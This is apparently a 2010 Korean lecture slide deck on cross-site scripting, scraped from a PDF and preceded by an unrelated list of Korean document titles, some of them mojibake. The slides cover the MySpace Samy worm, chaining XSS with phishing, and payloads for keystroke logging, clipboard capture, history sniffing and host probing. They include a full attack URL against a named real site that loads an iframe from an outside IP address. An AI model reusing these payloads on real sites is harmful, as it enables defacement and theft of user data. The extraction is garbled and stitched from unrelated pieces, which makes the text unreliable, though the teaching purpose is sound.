XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks



Similar documents

??

과 위 가 오는 경우에는 앞말 받침을 대표음으로 바꾼 [다가페]와 [흐귀 에]가 올바른 발음이 [안자서], [할튼], [업쓰므로], [절믐] 풀이 자음으로 끝나는 말인 앉- 과 핥-, 없-, 젊- 에 각각 모음으로 시작하는 형식형태소인 -아서, -은, -으므로, -음

<C0CEBCE2BABB2D33C2F7BCF6C1A420B1B9BFAAC3D1BCAD203130B1C72E687770>

<C3D6C1BE5FBBF5B1B9BEEEBBFDC8B0B0DCBFEFC8A C3D6C1BEBABB292E687770>

6±Ç¸ñÂ÷

초등국어에서 관용표현 지도 방안 연구

untitled

민주장정-노동운동(분권).indd


177

E1-정답및풀이(1~24)ok

제주어 교육자료(중등)-작업.hwp

<C1B6BCB1B4EBBCBCBDC3B1E2342DC3D6C1BE2E687770>

¸é¸ñ¼Ò½ÄÁö 63È£_³»Áö ÃÖÁ¾

최우석.hwp

時 習 說 ) 5), 원호설( 元 昊 說 ) 6) 등이 있다. 7) 이 가운데 임제설에 동의하는바, 상세한 논의는 황패강의 논의로 미루나 그의 논의에 논거로서 빠져 있는 부분을 보강하여 임제설에 대한 변증( 辨 證 )을 덧붙이고자 한다. 우선, 다음의 인용문을 보도록

< BDC3BAB8C1A4B1D4C6C75BC8A3BFDC D2E687770>

0429bodo.hwp

교사용지도서_쓰기.hwp

cls46-06(심우영).hwp

伐)이라고 하였는데, 라자(羅字)는 나자(那字)로 쓰기도 하고 야자(耶字)로 쓰기도 한다. 또 서벌(徐伐)이라고도 한다. 세속에서 경자(京字)를 새겨 서벌(徐伐)이라고 한다. 이 때문에 또 사라(斯羅)라고 하기도 하고, 또 사로(斯盧)라고 하기도 한다. 재위 기간은 6

01Report_210-4.hwp

<C3D1BCB15FC0CCC8C45FBFECB8AE5FB1B3C0B0C0C75FB9E6C7E D352D32315FC5E4292E687770>



교육 과 학기 술부 고 시 제 호 초 중등교육법 제23조 제2항에 의거하여 초 중등학교 교육과정을 다음과 같이 고시합니다. 2011년 8월 9일 교육과학기술부장관 1. 초 중등학교 교육과정 총론은 별책 1 과 같습니다. 2. 초등학교 교육과정은 별책

시험지 출제 양식

우리나라의 전통문화에는 무엇이 있는지 알아봅시다. 우리나라의 전통문화를 체험합시다. 우리나라의 전통문화를 소중히 여기는 마음을 가집시다. 5. 우리 옷 한복의 특징 자료 3 참고 남자와 여자가 입는 한복의 종류 가 달랐다는 것을 알려 준다. 85쪽 문제 8, 9 자료

상품 전단지

::: 해당사항이 없을 경우 무 표시하시기 바랍니다. 검토항목 검 토 여 부 ( 표시) 시 민 : 유 ( ) 무 시 민 참 여 고 려 사 항 이 해 당 사 자 : 유 ( ) 무 전 문 가 : 유 ( ) 무 옴 브 즈 만 : 유 ( ) 무 법 령 규 정 : 교통 환경 재

2

DBPIA-NURIMEDIA

화이련(華以戀) hwp

ÆòÈ�´©¸® 94È£ ³»Áö_ÃÖÁ¾

歯1##01.PDF

<5BC1F8C7E0C1DF2D31B1C75D2DBCF6C1A4BABB2E687770>

120229(00)(1~3).indd

2힉년미술

레이아웃 1

< B5BFBEC6BDC3BEC6BBE E687770>

<3130BAB9BDC428BCF6C1A4292E687770>

11민락초신문4호

제1절 조선시대 이전의 교육

사진 24 _ 종루지 전경(서북에서) 사진 25 _ 종루지 남측기단(동에서) 사진 26 _ 종루지 북측기단(서에서) 사진 27 _ 종루지 1차 건물지 초석 적심석 사진 28 _ 종루지 중심 방형적심 유 사진 29 _ 종루지 동측 계단석 <경루지> 위 치 탑지의 남북중심

새만금세미나-1101-이양재.hwp

652

歯 조선일보.PDF

<33B1C7C3D6C1BEBABB28BCF6C1A42D E687770>

<C1DFB1DE2842C7FC292E687770>

96부산연주문화\(김창욱\)

< C1A633B1C75FC3D6C1BE5FBCF6C1A4BABB2E687770>

???? 1

목 차 국회 1 월 중 제 개정 법령 대통령령 7 건 ( 제정 -, 개정 7, 폐지 -) 1. 댐건설 및 주변지역지원 등에 관한 법률 시행령 일부개정 1 2. 지방공무원 수당 등에 관한 규정 일부개정 1 3. 경력단절여성등의 경제활동 촉진법 시행령 일부개정 2 4. 대

종사연구자료-이야기방 hwp

정 답 과 해 설 1 (1) 존중하고 배려하는 언어생활 주요 지문 한 번 더 본문 10~12쪽 [예시 답] 상대에게 상처를 주고 한 사 람의 삶을 파괴할 수도 있으며, 사회 전체의 분위기를 해쳐 여러 가지 사회 문제를 발생시킬 수 있다. 04 5

<34B1C720C0CEB1C7C4A7C7D828C3D6C1BEC6EDC1FD D28BCF6C1A4292E687770>

160215

참고 금융분야 개인정보보호 가이드라인 1. 개인정보보호 관계 법령 개인정보 보호법 시행령 신용정보의 이용 및 보호에 관한 법률 시행령 금융실명거래 및 비밀보장에 관한 법률 시행령 전자금융거래법 시행령 은행법 시행령 보험업법 시행령 자동차손해배상 보장법 시행령 자본시장과

hwp

580 인물 강순( 康 純 1390(공양왕 2) 1468(예종 즉위년 ) 조선 초기의 명장.본관은 신천( 信 川 ).자는 태초( 太 初 ).시호는 장민( 莊 愍 ).보령현 지내리( 保 寧 縣 池 內 里,지금의 보령시 주포면 보령리)에서 출생하였다.아버지는 통훈대부 판무

<C1DFB0B3BBE7B9FD3128B9FDB7C92C20B0B3C1A4B9DDBFB5292E687770>

ad hwp

3. 은하 1 우리 은하 위 : 나선형 옆 : 볼록한 원반형 태양은 은하핵으로부터 3만광년 떨어진 곳에 위치 2 은하의 분류 규칙적인 모양의 유무 타원은하, 나선은하와 타원은하 나선팔의 유무 타원은하와 나선 은하 막대 모양 구조의 유무 정상나선은하와 막대나선은하 4.

근대문화재분과 제4차 회의록(공개)

인천광역시의회 의원 상해 등 보상금 지급에 관한 조례 일부개정조례안 의안 번호 179 제안연월일 : 제 안 자 :조례정비특별위원회위원장 제안이유 공무상재해인정기준 (총무처훈령 제153호)이 공무원연금법 시행규칙 (행정자치부령 제89호)으로 흡수 전면 개

교육실습 소감문

1

¼þ·Ê¹®-5Àå¼öÁ¤

109

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

단위: 환경정책 형산강살리기 수중정화활동 지원 10,000,000원*90%<절감> 형산강살리기 환경정화 및 감시활동 5,000,000원*90%<절감> 9,000 4, 민간행사보조 9,000 10,000 1,000 자연보호기념식 및 백일장(사생,서예)대회 10

歯 동아일보(2-1).PDF

며 오스본을 중심으로 한 작은 정부, 시장 개혁정책을 밀고 나갔다. 이에 대응 하여 노동당은 보수당과 극명히 반대되는 정강 정책을 내세웠다. 영국의 정치 상황은 새누리당과 더불어 민주당, 국민의당이 서로 경제 민주화 와 무차별적 복지공약을 앞세우며 표를 구걸하기 위한

194

<33352D2D31342DC0CCB0E6C0DA2E687770>

<B9E9B3E2C5CDBFEFB4F5B5EBBEEE20B0A1C1A4B8AE20B1E6C0BB20B0C8B4C2B4D92E687770>

1) 음운 체계상의 특징 음운이란 언어를 구조적으로 분석할 때, 가장 작은 언어 단위이다. 즉 의미분화 를 가져오는 최소의 단위인데, 일반적으로 자음, 모음, 반모음 등의 분절음과 음장 (소리의 길이), 성조(소리의 높낮이) 등의 비분절음들이 있다. 금산방언에서는 중앙

DBPIA-NURIMEDIA

1-1Çؼ³

내지4월최종

주지스님의 이 달의 법문 성철 큰스님 기념관 불사를 회향하면서 20여 년 전 성철 큰스님 사리탑을 건립하려고 중국 석굴답사 연구팀을 따라 중국 불교성지를 탐방하였습 니다. 대동의 운강석굴, 용문석굴, 공의석굴, 맥적산석 굴, 대족석굴, 티벳 라싸의 포탈라궁과 주변의 큰

15강 판소리계 소설 심청전 다음 글을 읽고 물음에 답하시오. [1106월 평가원] 1)심청이 수궁에 머물 적에 옥황상제의 명이니 거행이 오죽 하랴. 2) 사해 용왕이 다 각기 시녀를 보내어 아침저녁으로 문 안하고, 번갈아 당번을 서서 문안하고 호위하며, 금수능라 비

2 국어 영역(A 형). 다음 대화에서 석기 에게 해 줄 말로 적절한 것은? 세워 역도 꿈나무들을 체계적으로 키우는 일을 할 예정 입니다. 주석 : 석기야, 너 오늘따라 기분이 좋아 보인다. 무슨 좋은 일 있니? 석기 : 응, 드디어 내일 어머니께서 스마트폰 사라고 돈

Microsoft Word - 青野論文_李_.doc

루앙 의 공포 *주민들은 어두운 방 안에서 온갖 지혜와 힘이 도움이 되지 않는 천재지변이나 살인적인 대혼란이 가져다주는 엄청난 공포에 사로잡혀 있었다. 이와 같은 느낌은 기존의 질서가 뒤집 히거나, 더 이상 안전이 보장되지 않거나, 인간의 법이나 자연의 법칙이 보호해

<B3EBB5BFB0FCB0E8B9FD20B1B9C8B820B0E8B7F920C0C7BEC828C3D6C1BE29A4BB2E687770>

<B5B6BCADC7C1B7CEB1D7B7A52DC0DBBEF7C1DF E687770>

No Title

부벽루 이색 핵심정리+핵심문제.hwp

입장

PSAT¿¹Á¦Áý ȨÆäÀÌÁö °Ô½Ã (¼öÁ¤_200210) .hwp

京 畿 鄕 土 史 學 第 16 輯 韓 國 文 化 院 聯 合 會 京 畿 道 支 會

<C3D6BFECBCF6BBF328BFEBB0ADB5BF29202D20C3D6C1BE2E687770>

<B0ADC8ADC7D0C6C428C3D6C1BE292E687770>

PDF

2월 강습회원의 수영장 이용기간은 매월 1일부터 말일까지로 한다.다만,월 자유수영회 원,자유수영 후 강습회원은 접수일 다음달 전일에 유효기간이 종료된다.<개정 , > 제10조(회원증 재발급)1회원증을 교부받은 자가 분실,망실,훼손 및


인 사 청 문 요 청 사 유 서

산림병해충 방제규정 4. 신문 방송의 보도내용 등 제6 조( 조사지역) 제5 조에 따른 발생조사는 다음 각 호의 지역으로 구분하여 조사한다. 1. 특정지역 : 명승지 유적지 관광지 공원 유원지 및 고속국도 일반국도 철로변 등 경관보호구역 2. 주요지역 : 병해충별 선단

Transcription:

XSS s XSS, s, May 25, 2010

XSS s 1 2 s 3

XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록.

s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여 공격. 상호 보완하여 완벽한 공격이 가능.

XSS s 웹페이지 인자값을 통해 내용을 조작. 특정 컨텐츠를 삽입하여 유도.

XSS s /error.php?message=we are very sorry...<a href=... >OtherApp.com</a> to continue...

XSS s http://www.daekum.com/order/szsearch.php3 Firefox http://www.daekum.com/order/szsearch.php3?mode= search1&search=</font><script>eval(location.hash. substr(1))</script>#document.body.bgcolor= black ;document.write( <iframeheight=2000src="http: //166.104.245.142/wah/deface1.html"onload= "resizeframe(this)"frameborder=0></iframe> );

XSS s 수행방법은 위와 동일. 사용자의 개인정보 입력을 유도하여 정보를 수집. 로그인 정보를 입력하도록 유도. 금융 정보를 입력하도록 유도.

XSS s

XSS s 피해자가 특정 행동을 유발하도록 함. 해당 행동을 피해자가 한 것이 되므로 공격자의 흔적이 남지 않음.

XSS s 피해자의 자동완성 정보 수집. 자동완성이 켜져있는 경우, autocomplete 캐시에 값이 저장되어 있음. autocomplete 캐시의 값을 공격자 pc로 전송. 공격자의 도메인명을 신뢰된 사이트 영역에 추가하도록 요구.

Log Keystrokes XSS s 피해자 브라우저에서 키입력을 수집. <script> document.onkeypress = function (); { window.status + = String.fromCharCode ( window.event.keycode ) ; } < /script> 키 이벤트 발생시마다 실행됨.

Capture Clipboard Contents XSS s 피해자 브라우저의 클립보드 내용을 가져옴. explorer 6에서 작동하는 코드. <script> alert(window.clipboarddata.getdata( Text )); < /script>

Steal History and Search Queries XSS s 사용자가 링크를 클릭하면 해당링크가 색이 바뀌어 표시됨. 브라우저에서 색상을 변경하므로 html상에서는 확인안됨. 자바스크립트의 getcomputedstyle API 를 사용하여 색상정보를 얻어냄. Brute-Force 방식으로 색이 바뀐 링크를 검색.

XSS s firefox 3.6, chrome 5.0에서 작동. explorer 6에서는 작동안됨. < a id = ref1 href = http : //www.wah.com > test < /a > < script > ref = document.getelementbyid( ref 1 ); refcolor = document.defaultv iew.getcomputedstyle(ref, ).getp ropertyv alue( color ); document.write(ref color); < /script >

Enumerate Currently Used Applications XSS s 로그인 상태가 아닐때 에러페이지를 반환하는 주소를 접근. 회원정보 페이지 등. 해당 페이지가 에러페이지나 로그인페이지가 아니면 로그인상태. 브라우저 동일출처 정책 때문에 아래의 코드를 사용함. window.onerror = fingerprint; <script src= https://other-app.com/mydetails.aspx > </script>

Port Scan the Local Network XSS s 브라우저 기반의 포트 스캔. 자바스크립트로 포트 스캔.

Other Network Hosts XSS 네트워크 호스트의 정보 파악. s 라우터가 netgear 제품인지 확인하는 스크립트 <img src= http://192.168.1.1/hm icon.gif onerror= notnetgear() >

Exploit Browser Vulnerabilities XSS s 브라우저 버그 플러그인 버그 ActiveX Firefox Add-on